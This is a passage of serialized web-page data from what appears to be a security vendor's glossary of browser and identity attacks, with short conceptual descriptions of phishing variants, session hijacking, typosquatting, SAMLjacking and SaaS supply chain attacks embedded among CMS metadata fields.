attacks","identity-attacks",{"sys":17016,"name":17018,"slug":17019,"tier":45},{"id":17017},"topic-passkeys","Passkeys","passkeys",{"sys":17021,"name":11471,"slug":11472,"tier":45},{"id":11470},{"sys":17023,"name":11511,"slug":11512,"tier":45},{"id":11510},{"sys":17025,"name":11506,"slug":11507,"tier":45},{"id":11505},{"sys":17027,"name":260,"slug":11500,"tier":45},{"id":11499},{"sys":17029,"name":245,"slug":3680,"tier":31},{"id":3679},{"sys":17031,"name":3708,"slug":3709,"tier":31},{"id":3707},"WpiA16cnJfSz7tEeimbZpsWFy_s2G60-DdfTujbsr3g",[17034,17146,17170,17232,17256,17280,17327,17379,17414,17448,17486,17557,17582,17703,17751,17789,17836,17883,17925,17983,18016,18157,18180,18203,18282,18321,18382,18406,18420,18468,18483,18507,18531,18570,18594,18618,18666,18699,18729,18776,18809,18832,18910,18949,18982,19006,19030,19078,19126,19166,19199,19233,19266,19289,19329,19353,19386,19484,19509],{"createdDate":17035,"data":17036,"id":17139,"lastUpdated":17140,"meta":17141,"modelId":17142,"name":17138,"published":13,"firstPublished":17143,"query":17144,"rev":17145},1790177714631,{"attackTechniques":17037,"browserIdentityAttacksMatrix":17048,"description":17133,"icon":17134,"state":17135,"title":17138,"visibleOnPage":19},[17038],{"attacks":17039},{"@type":105,"id":611,"model":452,"value":17040},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17041,"data":17042,"variations":17043,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17044,"meta":17045,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17046,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"azrrwqf6a48",[17049,17073,17089,17111],{"tag":17050},{"@type":105,"id":17051,"model":17052,"value":17053},"6801b9fd9cc347a98aa8a17e6c1b5e6b","browser-attacks-glossary-matrix-item",{"name":17054,"createdDate":17055,"modelId":17056,"data":17057,"meta":17068,"lastUpdated":17069,"id":17051,"query":17070,"published":13,"firstPublished":17071,"rev":17072},"SAT1015 \u002F Email phishing",1790176089883,"ea71e58f90bc45e6be5625a8bd37b466",{"title":17054,"name":17054,"url":17058,"blocks":17059,"state":17065},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Femail-phishing",[17060],{"id":17061,"@type":44,"tagName":73,"properties":17062,"responsiveStyles":17063},"builder-pixel-ryf89xx9zkc",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17064},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17066},{"path":21,"query":17067},{},{"kind":20},1790176089842,[],1790176799709,"aa0l1wnjh4t",{"tag":17074},{"@type":105,"id":17075,"model":17052,"value":17076},"bc3091c5674e402aabff670cb75cd9af",{"createdDate":17077,"id":17075,"name":17078,"modelId":17056,"published":13,"meta":17079,"stageModifiedSincePublish":6,"query":17081,"data":17082,"variations":17084,"lastUpdated":17085,"firstPublished":17086,"testRatio":31,"createdBy":32,"folders":17087,"lastUpdateSource":60,"lastUpdatedBy":478,"rev":17088},1790168725423,"SAT1042 \u002F AiTM phishing",{"breakpoints":17080,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":17078,"url":17083},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Faitm-phishing",{},1790168754297,1790168754285,[],"877a98xv86g",{"tag":17090},{"@type":105,"id":17091,"model":17052,"value":17092},"dc0e54bf3ca042079a55678fd6dba5b1",{"name":17093,"createdDate":17094,"modelId":17056,"data":17095,"lastUpdated":17106,"id":17091,"query":17107,"published":13,"firstPublished":17108,"meta":17109,"rev":17110},"SAT1048 \u002F Verification phishing",1790176104345,{"title":17093,"name":17093,"url":17096,"blocks":17097,"state":17103},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fverification-phishing",[17098],{"id":17099,"@type":44,"tagName":73,"properties":17100,"responsiveStyles":17101},"builder-pixel-is2ycd2kkzj",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17102},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17104},{"path":21,"query":17105},{},1790176104297,[],1790176799522,{"kind":20,"hasAutosaves":19},"7jgez85fyyw",{"tag":17112},{"@type":105,"id":17113,"model":17052,"value":17114},"b4e142d43f6545daad62edaa7af98283",{"name":17115,"createdDate":17116,"modelId":17056,"data":17117,"meta":17128,"lastUpdated":17129,"id":17113,"query":17130,"published":13,"firstPublished":17131,"rev":17132},"SAT1050 \u002F App-specific password phishing",1790176083824,{"title":17115,"name":17115,"url":17118,"blocks":17119,"state":17125},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fapp-specific-password-phishing",[17120],{"id":17121,"@type":44,"tagName":73,"properties":17122,"responsiveStyles":17123},"builder-pixel-cfl1l04iyme",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17124},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17126},{"path":21,"query":17127},{},{"kind":20},1790176083804,[],1790176799763,"iyz9upg9xpq","Zero-day phishing uses phishing pages that have never been seen before and therefore aren't in any threat intelligence feed or URL blocklist. By the time a phishing page is reported, flagged, and added to blocklists, the campaign has typically already succeeded.","regular:faFishingRod",{"deviceSize":83,"location":17136},{"path":21,"query":17137},{},"Zero-day phishing","60ed8a614ab34302b147e36165ceafe7",1790585532303,{"hasAutosaves":19,"kind":20},"b240daefef044bc2a065753ee5ce2175",1790177827203,[],"q29a3r7b1fk",{"createdDate":17147,"data":17148,"id":17165,"lastUpdated":17166,"meta":17167,"modelId":17142,"name":17164,"published":13,"firstPublished":17168,"query":17169,"rev":17145},1790177714062,{"attackTechniques":17149,"description":17159,"icon":17160,"state":17161,"title":17164,"visibleOnPage":19},[17150],{"attacks":17151},{"@type":105,"id":611,"model":452,"value":17152},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17153,"data":17154,"variations":17155,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17156,"meta":17157,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17158,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Vishing (voice phishing) is phishing conducted over phone calls rather than email. The attacker impersonates IT support, a bank, a vendor, or a colleague and directs the victim to take actions in their browser — visiting a phishing page, downloading remote access software, entering credentials, or approving an MFA prompt. Increasingly uses AI voice cloning to impersonate known individuals.","regular:faPhoneVolume",{"deviceSize":83,"location":17162},{"path":21,"query":17163},{},"Vishing (voice phishing)","f90db20513c4471bb01e51cbc6e29e52",1790585530594,{"kind":20},1790177827223,[],{"createdDate":17171,"data":17172,"id":17227,"lastUpdated":17228,"meta":17229,"modelId":17142,"name":17226,"published":13,"firstPublished":17230,"query":17231,"rev":17145},1790177713516,{"attackTechniques":17173,"browserIdentityAttacksMatrix":17183,"description":17220,"hint":17221,"icon":17222,"state":17223,"title":17226,"visibleOnPage":19},[17174],{"attacks":17175},{"@type":105,"id":611,"model":452,"value":17176},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17177,"data":17178,"variations":17179,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17180,"meta":17181,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17182,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[17184,17198],{"tag":17185},{"@type":105,"id":17091,"model":17052,"value":17186},{"name":17093,"createdDate":17094,"modelId":17056,"data":17187,"lastUpdated":17106,"id":17091,"query":17196,"published":13,"firstPublished":17108,"meta":17197,"rev":17110},{"title":17093,"name":17093,"url":17096,"blocks":17188,"state":17193},[17189],{"id":17099,"@type":44,"tagName":73,"properties":17190,"responsiveStyles":17191},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17192},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17194},{"path":21,"query":17195},{},[],{"kind":20,"hasAutosaves":19},{"tag":17199},{"@type":105,"id":17200,"model":17052,"value":17201},"d1dd72a46ff145fda363ed3d4206477f",{"name":17202,"createdDate":17203,"modelId":17056,"data":17204,"meta":17215,"lastUpdated":17216,"id":17200,"query":17217,"published":13,"firstPublished":17218,"rev":17219},"SAT1047 \u002F Cross-IdP Impersonation",1790176087003,{"title":17202,"name":17202,"url":17205,"blocks":17206,"state":17212},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fcross-idp-impersonation",[17207],{"id":17208,"@type":44,"tagName":73,"properties":17209,"responsiveStyles":17210},"builder-pixel-qeol1fvlce",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17211},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17213},{"path":21,"query":17214},{},{"kind":20},1790176086975,[],1790176799736,"ceb1tygpv1","Verification phishing is an attack where an adversary uses social engineering to convince a user to click an email verification link or share a verification code on the attacker's behalf. Email verification is commonly used as a control when registering new accounts — the attacker needs the target to complete this step to bypass it. Most relevant when combined with cross-IdP impersonation, where the attacker circumvents strong SSO authentication to gain direct control of downstream SaaS applications.","Also known as: email verification phishing \u002F verification code phishing","regular:faBadgeCheck",{"deviceSize":83,"location":17224},{"path":21,"query":17225},{},"Verification phishing","f4d123ebff294f25822eb714da9a5fb3",1790585529707,{"kind":20},1790177827235,[],{"createdDate":17233,"data":17234,"id":17251,"lastUpdated":17252,"meta":17253,"modelId":17142,"name":17250,"published":13,"firstPublished":17254,"query":17255,"rev":17145},1790177713043,{"attackTechniques":17235,"description":17245,"icon":17246,"state":17247,"title":17250,"visibleOnPage":19},[17236],{"attacks":17237},{"@type":105,"id":611,"model":452,"value":17238},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17239,"data":17240,"variations":17241,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17242,"meta":17243,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17244,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Typosquatting is the registration of domains that are common misspellings of legitimate sites (e.g. gooogle.com, microsoftt.com). Users who mistype a URL land on an attacker-controlled page serving phishing forms, malware downloads, or scam content. Attackers obtain valid SSL certificates for these domains, so the padlock icon provides no protection. Related to but distinct from homograph attacks.","regular:faKeyboard",{"deviceSize":83,"location":17248},{"path":21,"query":17249},{},"Typosquatting","3f2409500dec4cc881d57f42e8220775",1790585528914,{"kind":20},1790177827246,[],{"createdDate":17257,"data":17258,"id":17275,"lastUpdated":17276,"meta":17277,"modelId":17142,"name":17274,"published":13,"firstPublished":17278,"query":17279,"rev":17145},1790177712515,{"attackTechniques":17259,"description":17269,"icon":17270,"state":17271,"title":17274,"visibleOnPage":19},[17260],{"attacks":17261},{"@type":105,"id":611,"model":452,"value":17262},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17263,"data":17264,"variations":17265,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17266,"meta":17267,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17268,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Tabnabbing is a phishing technique that exploits inactive browser tabs. A malicious page detects when the user switches away, then silently changes its favicon, title, and content to mimic a login page. When the user returns, they see what looks like a session timeout and re-enter credentials.","regular:faArrowRightArrowLeft",{"deviceSize":83,"location":17272},{"path":21,"query":17273},{},"Tabnabbing","7e86fd6f529b4d7196378e84907e4322",1790585527674,{"kind":20},1790177827257,[],{"createdDate":17281,"data":17282,"id":17322,"lastUpdated":17323,"meta":17324,"modelId":17142,"name":17321,"published":13,"firstPublished":17325,"query":17326,"rev":17145},1790177712101,{"attackTechniques":17283,"browserIdentityAttacksMatrix":17293,"description":17316,"icon":17317,"state":17318,"title":17321,"visibleOnPage":19},[17284],{"attacks":17285},{"@type":105,"id":611,"model":452,"value":17286},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17287,"data":17288,"variations":17289,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17290,"meta":17291,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17292,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[17294],{"tag":17295},{"@type":105,"id":17296,"model":17052,"value":17297},"c0e0d85ec2144ce1a06c1ad4c03877da",{"name":17298,"createdDate":17299,"modelId":17056,"data":17300,"meta":17311,"lastUpdated":17312,"id":17296,"query":17313,"published":13,"firstPublished":17314,"rev":17315},"SAT1020 \u002F In-app phishing",1790176093733,{"title":17298,"name":17298,"url":17301,"blocks":17302,"state":17308},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fin-app-phishing",[17303],{"id":17304,"@type":44,"tagName":73,"properties":17305,"responsiveStyles":17306},"builder-pixel-q29so6nl5z",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17307},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17309},{"path":21,"query":17310},{},{"kind":20},1790176093714,[],1790176799655,"49aus2nriqd","Social media phishing is a phishing attack delivered through social media platforms — connection requests, direct messages, fake job offers, and sponsored posts containing malicious links. LinkedIn is heavily targeted for business-focused attacks (fake recruiter outreach, impersonated executives). Attackers create convincing profiles with stolen photos and fabricated work histories, or compromise legitimate accounts as a means to engage with their existing connections from a trusted point of contact.","regular:faUsers",{"deviceSize":83,"location":17319},{"path":21,"query":17320},{},"Social media phishing (LinkedIn, Facebook, X)","b34bf95c4c034b64b67e04ad9b35a1fd",1790585526617,{"hasAutosaves":19,"kind":20},1790177827440,[],{"createdDate":17328,"data":17329,"id":17374,"lastUpdated":17375,"meta":17376,"modelId":17142,"name":304,"published":13,"firstPublished":17377,"query":17378,"rev":17145},1790177711653,{"attackTechniques":17330,"browserIdentityAttacksMatrix":17345,"description":17368,"hint":17369,"icon":17370,"state":17371,"title":304,"visibleOnPage":19},[17331],{"attacks":17332},{"@type":105,"id":17333,"model":452,"value":17334},"5ec050dee7494d03b35d99fad93d0d46",{"createdDate":17335,"id":17333,"name":304,"modelId":456,"published":13,"meta":17336,"stageModifiedSincePublish":6,"query":17338,"data":17339,"variations":17340,"lastUpdated":17341,"firstPublished":17342,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17343,"rev":17344},1790174737984,{"breakpoints":17337,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":304,"url":306},{},1790174754793,1790174754784,[],"p400fynnfy",[17346],{"tag":17347},{"@type":105,"id":17348,"model":17052,"value":17349},"b4333a50a3c54b5f8e1bdcb6b2688255",{"name":17350,"createdDate":17351,"modelId":17056,"data":17352,"meta":17363,"lastUpdated":17364,"id":17348,"query":17365,"published":13,"firstPublished":17366,"rev":17367},"SAT1044 \u002F Session cookie theft",1790176100720,{"title":17350,"name":17350,"url":17353,"blocks":17354,"state":17360},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fsession-cookie-theft",[17355],{"id":17356,"@type":44,"tagName":73,"properties":17357,"responsiveStyles":17358},"builder-pixel-9wkqkwtg31",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17359},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17361},{"path":21,"query":17362},{},{"kind":20},1790176100700,[],1790176799572,"4o26vtgro86","Session hijacking is the theft and replay of authenticated session tokens to access accounts without credentials. Tokens are stolen via infostealers, XSS, man-in-the-browser malware, or network interception. Because the attacker uses a valid session token, MFA doesn't help — the authentication already happened.","Also known as: session theft \u002F token replay \u002F cookie theft \u002F session token hijacking","regular:faCookie",{"deviceSize":83,"location":17372},{"path":21,"query":17373},{},"fed1c0ab5b0b48dcbb2de7609e665c27",1790585525625,{"kind":20},1790177827451,[],{"createdDate":17380,"data":17381,"id":17409,"lastUpdated":17410,"meta":17411,"modelId":17142,"name":7821,"published":13,"firstPublished":17412,"query":17413,"rev":17145},1790177711071,{"attackTechniques":17382,"description":17403,"hint":17404,"icon":17405,"state":17406,"title":7821,"visibleOnPage":19},[17383,17393],{"attacks":17384},{"@type":105,"id":468,"model":452,"value":17385},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17386,"data":17387,"variations":17388,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17389,"meta":17390,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":17391,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"s41piewsc7e",{"attacks":17394},{"@type":105,"id":541,"model":452,"value":17395},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17396,"data":17397,"variations":17398,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17399,"meta":17400,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":17401,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"icludzxs49","SEO poisoning is the manipulation of organic search engine rankings to surface malicious pages for targeted queries. Attackers optimize pages for keywords enterprise employees are likely to search — VPN clients, software downloads, IT documentation — and serve phishing pages, malware downloads, or credential traps.","Also known as: search engine poisoning","regular:faMagnifyingGlass",{"deviceSize":83,"location":17407},{"path":21,"query":17408},{},"96cbfd1882dd43e581fe7bd95358d75a",1790585524280,{"kind":20},1790177827461,[],{"createdDate":17415,"data":17416,"id":17443,"lastUpdated":17444,"meta":17445,"modelId":17142,"name":17442,"published":13,"firstPublished":17446,"query":17447,"rev":17145},1790177710577,{"attackTechniques":17417,"description":17437,"icon":17438,"state":17439,"title":17442,"visibleOnPage":19},[17418,17428],{"attacks":17419},{"@type":105,"id":569,"model":452,"value":17420},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":17421,"stageModifiedSincePublish":6,"query":17423,"data":17424,"variations":17425,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17426,"rev":17427},{"breakpoints":17422,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],"3hpo1b17v4s",{"attacks":17429},{"@type":105,"id":611,"model":452,"value":17430},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17431,"data":17432,"variations":17433,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17434,"meta":17435,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17436,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Scareware and tech support scams use full-screen browser alerts that claim the user's device is infected, displaying a phone number for fake \"tech support.\" The alerts use browser APIs (fullscreen requests, beforeunload handlers, repeated dialog prompts) to make the tab feel unclosable. A delivery vector — leads to either malicious software downloads or voice-based social engineering when victims call the displayed number.","regular:faSiren",{"deviceSize":83,"location":17440},{"path":21,"query":17441},{},"Scareware \u002F tech support scams","b21140468d814531ae323351f5b365a0",1790585523411,{"kind":20},1790177827470,[],{"createdDate":17449,"data":17450,"id":17481,"lastUpdated":17482,"meta":17483,"modelId":17142,"name":17480,"published":13,"firstPublished":17484,"query":17485,"rev":17145},1790177710100,{"browserIdentityAttacksMatrix":17451,"description":17474,"hint":17475,"icon":17476,"state":17477,"title":17480,"visibleOnPage":19},[17452],{"tag":17453},{"@type":105,"id":17454,"model":17052,"value":17455},"41784061bff0476d8917609456c7ad15",{"name":17456,"createdDate":17457,"modelId":17056,"data":17458,"meta":17469,"lastUpdated":17470,"id":17454,"query":17471,"published":13,"firstPublished":17472,"rev":17473},"SAT1032 \u002F SAMLjacking",1790176100256,{"title":17456,"name":17456,"url":17459,"blocks":17460,"state":17466},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fsamljacking",[17461],{"id":17462,"@type":44,"tagName":73,"properties":17463,"responsiveStyles":17464},"builder-pixel-byco2nnabe",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17465},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17467},{"path":21,"query":17468},{},{"kind":20},1790176100240,[],1790176799578,"mq34s0mhzwe","SAMLjacking is an attack where a threat actor with admin access to an identity provider configures SAML federation to redirect authentication flows through an attacker-controlled IdP. This gives the attacker the ability to authenticate as any user in the federated environment without knowing their credentials. Can also be used for lateral movement — once an attacker compromises one IdP, they can pivot into downstream apps that trust SAML assertions from that provider.","Also known as: SAML hijacking \u002F federation hijacking","regular:faFileLock",{"deviceSize":83,"location":17478},{"path":21,"query":17479},{},"SAMLjacking","ef533b587a0644c4bac338415fa2266d",1790585522574,{"kind":20},1790177827476,[],{"createdDate":17487,"data":17488,"id":17552,"lastUpdated":17553,"meta":17554,"modelId":17142,"name":17551,"published":13,"firstPublished":17555,"query":17556,"rev":17145},1790177709677,{"attackTechniques":17489,"browserIdentityAttacksMatrix":17500,"description":17545,"hint":17546,"icon":17547,"state":17548,"title":17551,"visibleOnPage":19},[17490],{"attacks":17491},{"@type":105,"id":583,"model":452,"value":17492},{"createdDate":585,"id":583,"name":270,"modelId":456,"published":13,"meta":17493,"stageModifiedSincePublish":6,"query":17495,"data":17496,"variations":17497,"lastUpdated":591,"firstPublished":592,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17498,"rev":17499},{"breakpoints":17494,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":270,"url":272},{},[],"vu7z7jxmvhi",[17501,17523],{"tag":17502},{"@type":105,"id":17503,"model":17052,"value":17504},"b3d2c2e7d4794ff9b253c533eb6cb3a9",{"name":17505,"createdDate":17506,"modelId":17056,"data":17507,"lastUpdated":17518,"id":17503,"query":17519,"published":13,"firstPublished":17520,"meta":17521,"rev":17522},"SAT1001 \u002F Abuse existing OAuth integrations",1790176080909,{"title":17505,"name":17505,"url":17508,"blocks":17509,"state":17515},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fabuse-existing-oauth-integrations",[17510],{"id":17511,"@type":44,"tagName":73,"properties":17512,"responsiveStyles":17513},"builder-pixel-scmek2jsdrb",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17514},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17516},{"path":21,"query":17517},{},1790176080834,[],1790176799254,{"kind":20,"hasAutosaves":19},"2d54kwl0rgq",{"tag":17524},{"@type":105,"id":17525,"model":17052,"value":17526},"d575196eb7944bc2a4542b5c07d5ff81",{"name":17527,"createdDate":17528,"modelId":17056,"data":17529,"meta":17540,"lastUpdated":17541,"id":17525,"query":17542,"published":13,"firstPublished":17543,"rev":17544},"SAT1027 \u002F OAuth tokens",1790176097941,{"title":17527,"name":17527,"url":17530,"blocks":17531,"state":17537},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Foauth-tokens",[17532],{"id":17533,"@type":44,"tagName":73,"properties":17534,"responsiveStyles":17535},"builder-pixel-iqdj165am98",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17536},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17538},{"path":21,"query":17539},{},{"kind":20},1790176097915,[],1790176799601,"obooe0jytos","SaaS supply chain attacks compromise a third-party SaaS vendor and use it as a stepping stone into its customers' environments. The attacker breaches the vendor, then abuses the OAuth grants and API tokens its customers have already approved to access their data — no phishing, no login, no MFA prompt in the victim tenant. High-profile incidents targeting integrations connected to Salesforce, Snowflake, and Microsoft 365 follow this pattern.","Also known as: third-party app compromise \u002F vendor compromise","regular:faBoxesStacked",{"deviceSize":83,"location":17549},{"path":21,"query":17550},{},"SaaS supply chain attacks","c4b62e17e4684765997bcdd4c2ebab19",1790585521586,{"kind":20},1790177827483,[],{"createdDate":17558,"data":17559,"id":17577,"lastUpdated":17578,"meta":17579,"modelId":17142,"name":17576,"published":13,"firstPublished":17580,"query":17581,"rev":17145},1790177709245,{"attackTechniques":17560,"description":17571,"icon":17572,"state":17573,"title":17576,"visibleOnPage":19},[17561],{"attacks":17562},{"@type":105,"id":597,"model":452,"value":17563},{"createdDate":599,"id":597,"name":294,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17564,"data":17565,"variations":17566,"lastUpdated":603,"firstPublished":604,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17567,"meta":17568,"rev":17570},[],{"name":294,"url":296},{},[],{"breakpoints":17569,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"pnh6exs6ije","QR code phishing (quishing) uses QR codes embedded in emails, documents, or physical media to direct victims to phishing pages. Bypasses email link scanning because the URL is encoded in the image, not in a clickable link.","regular:faBarcodeRead",{"deviceSize":83,"location":17574},{"path":21,"query":17575},{},"QR code phishing (quishing)","14ba9e1112f843848d07ca4cdd497bee",1790585520548,{"kind":20},1790177827490,[],{"createdDate":17583,"data":17584,"id":17698,"lastUpdated":17699,"meta":17700,"modelId":17142,"name":245,"published":13,"firstPublished":17701,"query":17702,"rev":17145},1790177708731,{"attackTechniques":17585,"browserIdentityAttacksMatrix":17605,"description":17693,"icon":17694,"state":17695,"title":245,"visibleOnPage":19},[17586,17595],{"attacks":17587},{"@type":105,"id":611,"model":452,"value":17588},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17589,"data":17590,"variations":17591,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17592,"meta":17593,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":17594,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":17596},{"@type":105,"id":451,"model":452,"value":17597},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17598,"data":17599,"variations":17600,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":17601,"lastUpdateSource":60,"meta":17602,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":17603,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"p5goymruh1h",[17606,17620,17629,17651,17665,17679],{"tag":17607},{"@type":105,"id":17051,"model":17052,"value":17608},{"name":17054,"createdDate":17055,"modelId":17056,"data":17609,"meta":17618,"lastUpdated":17069,"id":17051,"query":17619,"published":13,"firstPublished":17071,"rev":17072},{"title":17054,"name":17054,"url":17058,"blocks":17610,"state":17615},[17611],{"id":17061,"@type":44,"tagName":73,"properties":17612,"responsiveStyles":17613},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17614},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17616},{"path":21,"query":17617},{},{"kind":20},[],{"tag":17621},{"@type":105,"id":17075,"model":17052,"value":17622},{"createdDate":17077,"id":17075,"name":17078,"modelId":17056,"published":13,"meta":17623,"stageModifiedSincePublish":6,"query":17625,"data":17626,"variations":17627,"lastUpdated":17085,"firstPublished":17086,"testRatio":31,"createdBy":32,"folders":17628,"lastUpdateSource":60,"lastUpdatedBy":478,"rev":17088},{"breakpoints":17624,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":17078,"url":17083},{},[],{"tag":17630},{"@type":105,"id":17631,"model":17052,"value":17632},"62df29aa4212432ea7795ad19d9348bf",{"name":17633,"createdDate":17634,"modelId":17056,"data":17635,"meta":17646,"lastUpdated":17647,"id":17631,"query":17648,"published":13,"firstPublished":17649,"rev":17650},"SAT1018 \u002F IM 